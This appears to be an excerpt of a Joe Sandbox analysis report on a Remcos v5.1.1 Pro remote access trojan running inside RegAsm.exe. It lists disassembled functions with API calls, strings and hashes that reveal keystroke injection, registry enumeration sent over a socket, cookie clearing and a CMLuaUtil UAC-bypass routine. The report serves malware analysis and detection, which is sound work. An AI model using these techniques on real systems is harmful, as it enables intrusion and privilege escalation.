                                                • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                Function 0041CE2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • AllocConsole.KERNEL32 ref: 0041CE35
                                                • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$Window$AllocOutputShow
                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                • API String ID: 4067487056-3820604032
                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendInput.USER32 ref: 00419A25
                                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InputSend$Virtual
                                                • String ID:
                                                • API String ID: 1167301434-0
                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16_free
                                                • String ID: a/p$am/pm$h{D
                                                • API String ID: 2936374016-2303565833
                                                • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • _free.LIBCMT ref: 00444E87
                                                • _free.LIBCMT ref: 00444E9E
                                                • _free.LIBCMT ref: 00444EBD
                                                • _free.LIBCMT ref: 00444ED8
                                                • _free.LIBCMT ref: 00444EEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$AllocateHeap
                                                • String ID: KED
                                                • API String ID: 3033488037-2133951994
                                                • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Enum$InfoQueryValue
                                                • String ID: [regsplt]$xUG$TG
                                                • API String ID: 3554306468-1165877943
                                                • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                • __fassign.LIBCMT ref: 1000954F
                                                • __fassign.LIBCMT ref: 1000956A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                • __fassign.LIBCMT ref: 0044B4F9
                                                • __fassign.LIBCMT ref: 0044B514
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumInfoOpenQuerysend
                                                • String ID: xUG$NG$NG$TG
                                                • API String ID: 3114080316-2811732169
                                                • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                • API String ID: 3286818993-122982132
                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                • API String ID: 1133728706-4073444585
                                                • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                • String ID: xpF
                                                • API String ID: 1852769593-354647465
                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                • _free.LIBCMT ref: 100092AB
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 100092B6
                                                • _free.LIBCMT ref: 100092C1
                                                • _free.LIBCMT ref: 10009315
                                                • _free.LIBCMT ref: 10009320
                                                • _free.LIBCMT ref: 1000932B
                                                • _free.LIBCMT ref: 10009336
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                • _free.LIBCMT ref: 00450FC8
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 00450FD3
                                                • _free.LIBCMT ref: 00450FDE
                                                • _free.LIBCMT ref: 00451032
                                                • _free.LIBCMT ref: 0045103D
                                                • _free.LIBCMT ref: 00451048
                                                • _free.LIBCMT ref: 00451053
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                • int.LIBCPMT ref: 004111BE
                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: (mG
                                                • API String ID: 2536120697-4059303827
                                                • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                • CoUninitialize.OLE32 ref: 00407664
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeObjectUninitialize_wcslen
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                • API String ID: 3851391207-1839356972
